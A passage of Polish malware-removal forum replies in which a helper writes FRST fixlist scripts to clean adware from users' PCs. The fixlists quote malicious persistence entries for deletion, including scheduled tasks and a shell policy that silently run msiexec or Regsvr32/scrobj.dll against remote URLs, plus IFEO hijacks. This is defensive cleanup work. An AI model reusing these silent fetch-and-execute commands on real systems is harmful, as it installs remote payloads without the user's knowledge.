Miszel03

​Całe szczęście, że nie mogłeś go użyć. Autor tego bloga nie wie co zaleca - KLIK. Raport niekompletne. Gdzie log z MBAM i AdwCleaner? Nie mam już ochoty się o to dopraszać, więc jadę od nowa ze skanami. Meritum: widać sporo szczątek po infekcjach adware. Podejrzewam uszkodzenie Zmiennej środowiskowej Path - widoczne są ścieżki relatywne. Na razie poszerzam diagnostykę, nie wdrążam rekonstrukcji. 1. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1 HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia GroupPolicyScripts: Ograniczenia HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-1280168119-2054726452-3514120849-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = S2 Bonjour Service; Brak ImagePath S2 Origin Web Helper Service; Brak ImagePath S3 Sense; "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" [X] S2 SkypeUpdate; Brak ImagePath U3 uxldipod; C:\Users\007marc\AppData\Local\Temp\uxldipod.sys [56584 2017-05-23] (GMER) [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePath U4 DiagTrack; Brak ImagePath U4 TimeBroker; Brak ImagePath Task: {A15E2711-C513-4908-B7D5-948AEBC71353} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phisokanadaing => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SamsungXSSDX850XEVOX1TB_S2RFNX0H605538A&d=20170512 /q HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "3O5H6RIBDJDQQYO" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "D7HWVT7HVLJZMMT" C:\Users\007marc\AppData\Roaming\Songbird2 C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk C:\Users\007marc\Desktop\BD-RE.lnk C:\Users\007marc\Desktop\Ghost Files.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\= INNE =\Skype.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google ] DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google CMD: set CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Paweł\AppData\Local CMD: dir /a C:\Users\Paweł\AppData\LocalLow CMD: dir /a C:\Users\Paweł\AppData\Roaming Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). songbird2 Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Samo nic się nie robi, skoro przeczytałeś lekturę to chyba dobrze o tym wiesz. Log Addition jest zniekształcony, proszę wygeneruj nowy.

W systemie widać nieciekawe instalacje, po za tym jakieś stare igraszki na powłoce startowej (MBAM chyba nie usunął dobrze tego robaka). Jeśli zaś chodzi o problem z aktualizacjami, stronami to wygląda na to, że łańcuch sieciowy został uszkodzony i wdrążam jego rekonstrukcje. 1. Wyczyść punkty przywracania systemu - KLIK. 2. Przez panel sterowania odinstaluj: Wrapper adware / PUP: Internet Explorer 8 Packages. Sugeruję również pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1935655697-329068152-1417001333-1004\...\Winlogon: [shell] C:\WINDOWS\Explorer.exe [1035264 2008-04-15] (Microsoft Corporation) S3 filtertdidriver; system32\drivers\ewfiltertdidriver.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] S4 IntelIde; Brak ImagePath C:\Documents and Settings\All Users\Pulpit\Adobe Reader XI.lnk C:\Documents and Settings\All Users\Pulpit\OpenFM.lnk C:\Documents and Settings\All Users\Menu Start\Programy\Liceum klasa 2\Matematyka podstawowa.lnk C:\Documents and Settings\PC\Pulpit\TomTom MyDrive Connect.lnk C:\Documents and Settings\PC\Menu Start\Programy\TomTom\Odinstaluj TomTom MyDrive Connect.lnk C:\Documents and Settings\PC\Menu Start\Programy\TomTom\TomTom MyDrive Connect.lnk CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Minęło 6 dni...te raporty mogą być nieaktualne. Proszę o nowe, wygenerowane najnowszą wersją FRST. Przepraszam za opóźnienia.

Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe w Harmonogramie zadań uruchamiające różne strony. Masa usług i wpisów adware. Przeglądarka Mozilla FireFox woła o pomstę do nieba. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-140913146-4283183929-3759989110-1000\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Footjane RemoveDirectory: C:\Users\Oli\AppData\Local\Footjane RemoveDirectory: C:\Users\Oli\AppData\Roaming\Footjane Task: {BA878794-B41C-47F6-A09A-F53A4B842565} - System32\Tasks\Voqeysocis Schedule => C:\Program Files (x86)\Werkas\pihadom.exe Task: {E1B18D9A-CE9A-4FF9-A12C-0DE6209CFF5B} - System32\Tasks\Microsoft\Windows\DeviceSettings\Reogent => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD2500BEKT-75A25T0_WD-WXQ1A80R9996R9996&d=20170510 /q Task: {E818543E-DC05-4EBF-9B13-6AC5CEFD1A6F} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-18] () RemoveDirectory: C:\Program Files (x86)\Werkas RemoveDirectory: C:\Program Files (x86)\MIO C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{AC0D3C9C-52FD-43D8-B252-4C1C2ED2FD47}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe FirewallRules: [TCP Query User{8D36DB04-EE8F-4931-868A-1DCE319AE25D}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe] => (Block) C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe FirewallRules: [uDP Query User{E71CB1E7-6B13-4A28-9745-0DBF238B1716}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe] => (Block) C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe FirewallRules: [{1B4F49D9-8FFB-457B-BCEA-FD7F729DBB71}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd2500bekt-75a25t0_wd-wxq1a80r9996r9996.dat FirewallRules: [{984613D8-4B99-469A-9A9F-778CE2FAE2C4}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd2500bekt-75a25t0_wd-wxq1a80r9996r9996.dat FirewallRules: [{598155CE-D4A6-44FF-B0BB-B6884462442E}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{44D4CAF7-DB39-4716-9636-D1D9379B9EDB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\ThinkPad\AppData\Local\Firefox RemoveDirectory: C:\Users\ThinkPad\AppData\Roaming\Firefox HKLM\...\Providers\i7w852aa: C:\Program Files (x86)\Voqeysocis Schedule\local64spl.dll [311808 2017-05-10] () IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {0A347CC0-316E-11E7-8DD3-64006A5CFC23} - C:\Users\ThinkPad\AppData\Roaming\Grohation\Sopishroqpy.dll -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku C:\Program Files (x86)\Voqeysocis Schedule C:\Users\ThinkPad\AppData\Roaming\Grohation R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-15] (BIT) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\ThinkPad\AppData\Local\CSHMDR\Snare.dll [832000 2017-05-18] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-19] () R2 WinSAPSvc; C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc\WinSAP.dll [1873920 2017-05-18] (TODO: ) [brak podpisu cyfrowego] U3 uxlyrkog; \??\C:\Users\ThinkPad\AppData\Local\Temp\uxlyrkog.sys [X] C:\ProgramData\BIT C:\Users\ThinkPad\AppData\Local\CSHMDR C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). footjane;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

KOMPUTER 1 Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. Treść lektury zweryfikuję w przyszłości sprawdzając czy ktoś z takim adresem IP / nickiem założył kolejny temat z pomocą 1. Przez panel sterowania odinstaluj: Programy typu PUP / adware: Browser-Security. Fałszywe oprogramowanie: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Local\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Roaming\Bagsarah Task: {1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll Task: {FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{4BDE3553-DFE9-4C43-BF35-695B79DE0740}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6EBED432-3F9F-42B1-99AE-71CE5A061BEC}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Oli\AppData\Local\Firefox RemoveDirectory: C:\Users\Oli\AppData\Roaming\Firefox HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X] 2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00 C:\Users\Oli\Desktop\BigFarm.lnk C:\Users\Oli\Desktop\big_bang_empire.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. KOMPUTER 2 Brak oznak infekcji. 1. Odinstaluj: SecurityCenter (masz przecież rozwiązanie ESET). 2. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Brakuje raportu Shortcut generowanego przez FRST- uzupełnij.

Zagrożenia z MBAM daj do kasacj - nic zbytnio alarmującego to to nie jest. Temat przenoszę do działu Hardware - pewni w nim leży problem. Przeczytaj uważnie co napisał Rucek. Ja jako Moderator również zwracam uwagę na nick i nie wykonywanie poleceń.

Spróbuj zostawić tą aktualizację na noc. Jeśli nadal będzie problem to nie widzę innego (równie szybkiego i skutecznego) rozwiązania niż kompleksowa deinstalacja Comodo (z użyciem dedykowanego czyściciela).

A gdzie raport FRST.txt?

Popełniłem literówkę przez przypadek w instrukcji do przeszukiwania rejestru (zamiast słowa zoohair dałem zoohari). Powtórz punkt 6, tylko tym razem wklej taki skrypt: zoohair;boxbob;firefox. Chyba stawiałbym na darmowe rozwiązanie Avast. W testach wypada dobrze, a patrząc po tym co widzę na forum to też się nieźle sprawuje. Ewentualnie Avira, ale jak na nią się zdecydujesz to uważnie instaluj. Czyli: chcesz tylko antywirusa, bez toolbarów itp. rzeczy.

Proszę o nowy zestaw raportów i przepraszam za opróżniania.

Proszę mi dać jeszcze trochę czasu - naprawdę nie mam go zbyt wiele.

W raportach brak oznak infekcji, a kosmetykę pomijam, bo po pierwsze jest malutka i nie istotna, a po drugie nie wiem czy to nie pogorszy problemu z komputerem. To dziesięcioletni sprzęt i niestety tutaj raczej nic innego niż Hardware zawinić nie mogło. Widzę, że był używany DLL-Fixer, a to wątpliwy twór integrujący w pliki systemowe. W takim razie proszę o pełny skan za pomocą Mlawarebytes AntiMalware, który jest u Ciebie zainstalowany (= robisz tylko kompleks aktualizacji). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

W gwoli ścisłości: strona główna = strona domowa Google. Nie dobreprogrmy, ani żadne inne nie dokończę, bo jeszcze do sądu mnie podadzą -. System jest zainfekowany przez adware i to tyle co powiem. Bo jak miałbym opisywać każdy przypadek osobno to bym trafił na noszach do wariatkowa i powtarzał bym w kolo to samo. 1. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-34139168-802105453-4214481315-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-34139168-802105453-4214481315-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShortcutTarget: Torpedo.lnk -> E:\Pobrane\Filmy\Torpedo\Torpedo.exe (Brak pliku) GroupPolicy: Ograniczenia - Chrome GroupPolicy\User: Ograniczenia ? GroupPolicyUsers\S-1-5-21-34139168-802105453-4214481315-1003\User: Ograniczenia CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia SearchScopes: HKLM -> DefaultScope - brak wartości SearchScopes: HKU\S-1-5-21-34139168-802105453-4214481315-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF Extension: (Brak nazwy) - C:\Users\PietruU\AppData\Roaming\Mozilla\Firefox\Profiles\an6l5ncm.default-1438113267081\extensions\default_newtabff@gmail.com [nie znaleziono] FF Extension: (Brak nazwy) - C:\Users\PietruU\AppData\Roaming\Mozilla\Firefox\Profiles\an6l5ncm.default-1438113267081\extensions\yahooprotected@gmail.com [nie znaleziono] CHR StartupUrls: Default -> "hxxps://www.google.pl/","hxxp://www.delta-homes.com/?type=hp&ts=1430994247&from=wpm05073&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A","hxxp://www.delta-homes.com/?type=hp&ts=1432127540&z=336b0f84efac891caec2736g9z1c2o7g9o4mawcz1o&from=wpm05203&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A","hxxp://www.delta-homes.com/?type=hp&ts=1437041109&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=wpm07163&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A","hxxp://www.google.com/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X] S3 TEAM; system32\DRIVERS\RtTeam60.sys [X] Task: {A598D09B-A59F-4FE4-B075-E17E7C2E27E6} - System32\Tasks\LXTRRLNZ => C:\Users\PietruU\AppData\Roaming\LXTRRLNZ.exe Task: C:\Windows\Tasks\LXTRRLNZ.job => C:\Users\PietruU\AppData\Roaming\LXTRRLNZ.exe C:\Users\PietruU\AppData\Roaming\LXTRRLNZ.exe AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [118] ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sparta\Sparta.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Sparta.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarki. Google Chrome Zresetuj synchronizację 